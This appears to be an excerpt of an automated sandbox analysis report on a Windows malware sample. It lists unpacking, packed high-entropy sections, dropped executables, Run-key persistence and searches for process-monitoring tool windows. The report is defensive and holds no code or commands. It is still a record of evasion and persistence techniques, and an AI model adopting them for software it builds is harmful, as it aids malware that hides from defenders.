Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Sheets.lnk.16.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.16.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.16.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.16.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.16.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.16.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 3042304 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe

Static PE information: Raw size of dvclnttf is bigger than: 0x100000 < 0x2b5000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W;dvclnttf:EW;migevdii:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dvclnttf:EW;migevdii:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;dvclnttf:EW;migevdii:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dvclnttf:EW;migevdii:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;dvclnttf:EW;migevdii:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dvclnttf:EW;migevdii:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Unpacked PE file: 13.2.2656cd82fe.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ipikowml:EW;bmxpstlu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ipikowml:EW;bmxpstlu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Unpacked PE file: 21.2.cd39094ad6.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qlmsecti:EW;gcgddbmv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qlmsecti:EW;gcgddbmv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Unpacked PE file: 34.2.cd39094ad6.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qlmsecti:EW;gcgddbmv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qlmsecti:EW;gcgddbmv:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: cd39094ad6.exe.6.dr	Static PE information: real checksum: 0x1d2e82 should be: 0x1cf0b8
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x45677d should be: 0x44f37c
Source: random[2].exe0.6.dr	Static PE information: real checksum: 0x1d2e82 should be: 0x1cf0b8
Source: 4b8eda303b.exe.6.dr	Static PE information: real checksum: 0x45677d should be: 0x44f37c
Source: 2656cd82fe.exe.6.dr	Static PE information: real checksum: 0x44931c should be: 0x44581b
Source: ccdb824191.exe.6.dr	Static PE information: real checksum: 0x1d3ad2 should be: 0x1ce953
Source: file.exe	Static PE information: real checksum: 0x2e78b8 should be: 0x2e88b3
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2e78b8 should be: 0x2e88b3
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x44931c should be: 0x44581b
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x1d3ad2 should be: 0x1ce953

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: dvclnttf
Source: file.exe	Static PE information: section name: migevdii
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: dvclnttf
Source: skotes.exe.0.dr	Static PE information: section name: migevdii
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: xtfxuijo
Source: random[1].exe.6.dr	Static PE information: section name: svksalgd
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 4b8eda303b.exe.6.dr	Static PE information: section name:
Source: 4b8eda303b.exe.6.dr	Static PE information: section name: .idata
Source: 4b8eda303b.exe.6.dr	Static PE information: section name:
Source: 4b8eda303b.exe.6.dr	Static PE information: section name: xtfxuijo
Source: 4b8eda303b.exe.6.dr	Static PE information: section name: svksalgd
Source: 4b8eda303b.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: ipikowml
Source: random[1].exe0.6.dr	Static PE information: section name: bmxpstlu
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: 2656cd82fe.exe.6.dr	Static PE information: section name:
Source: 2656cd82fe.exe.6.dr	Static PE information: section name: .idata
Source: 2656cd82fe.exe.6.dr	Static PE information: section name:
Source: 2656cd82fe.exe.6.dr	Static PE information: section name: ipikowml
Source: 2656cd82fe.exe.6.dr	Static PE information: section name: bmxpstlu
Source: 2656cd82fe.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: zvacajzt
Source: random[2].exe.6.dr	Static PE information: section name: acgxgepq
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: ccdb824191.exe.6.dr	Static PE information: section name:
Source: ccdb824191.exe.6.dr	Static PE information: section name: .idata
Source: ccdb824191.exe.6.dr	Static PE information: section name:
Source: ccdb824191.exe.6.dr	Static PE information: section name: zvacajzt
Source: ccdb824191.exe.6.dr	Static PE information: section name: acgxgepq
Source: ccdb824191.exe.6.dr	Static PE information: section name: .taggant
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name: .idata
Source: random[2].exe0.6.dr	Static PE information: section name:
Source: random[2].exe0.6.dr	Static PE information: section name: qlmsecti
Source: random[2].exe0.6.dr	Static PE information: section name: gcgddbmv
Source: random[2].exe0.6.dr	Static PE information: section name: .taggant
Source: cd39094ad6.exe.6.dr	Static PE information: section name:
Source: cd39094ad6.exe.6.dr	Static PE information: section name: .idata
Source: cd39094ad6.exe.6.dr	Static PE information: section name:
Source: cd39094ad6.exe.6.dr	Static PE information: section name: qlmsecti
Source: cd39094ad6.exe.6.dr	Static PE information: section name: gcgddbmv
Source: cd39094ad6.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D8D91C push ecx; ret	0_2_00D8D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D81359 push es; ret	0_2_00D8135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00FCD91C push ecx; ret	2_2_00FCD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FBB1EF push ecx; ret	3_2_00FBB1F0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00FCD91C push ecx; ret	3_2_00FCD92F
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004E306E push ecx; ret	7_2_004E3081
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004E306E push ecx; ret	9_2_004E3081
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00446061 push edx; retf	11_2_00446062
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh	11_2_0043CA63
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00445A2E push esi; ret	11_2_00445A31
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00442543 push esp; retf	11_2_00442549
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00446EA4 push edi; iretd	11_2_00446EA5
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 11_2_00439F70 push eax; mov dword ptr [esp], 60616263h	11_2_00439F7F

Source: file.exe	Static PE information: section name: entropy: 7.9859445978174755
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.9859445978174755
Source: random[1].exe.6.dr	Static PE information: section name: xtfxuijo entropy: 7.955466178502417
Source: 4b8eda303b.exe.6.dr	Static PE information: section name: xtfxuijo entropy: 7.955466178502417
Source: random[1].exe0.6.dr	Static PE information: section name: ipikowml entropy: 7.955350433382091
Source: 2656cd82fe.exe.6.dr	Static PE information: section name: ipikowml entropy: 7.955350433382091
Source: random[2].exe.6.dr	Static PE information: section name: entropy: 7.9815023632122415
Source: random[2].exe.6.dr	Static PE information: section name: zvacajzt entropy: 7.955231481704784
Source: ccdb824191.exe.6.dr	Static PE information: section name: entropy: 7.9815023632122415
Source: ccdb824191.exe.6.dr	Static PE information: section name: zvacajzt entropy: 7.955231481704784
Source: random[2].exe0.6.dr	Static PE information: section name: qlmsecti entropy: 7.954129284936792
Source: cd39094ad6.exe.6.dr	Static PE information: section name: qlmsecti entropy: 7.954129284936792

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cd39094ad6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5cbc6b58d3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7ea0decd34.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccdb824191.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
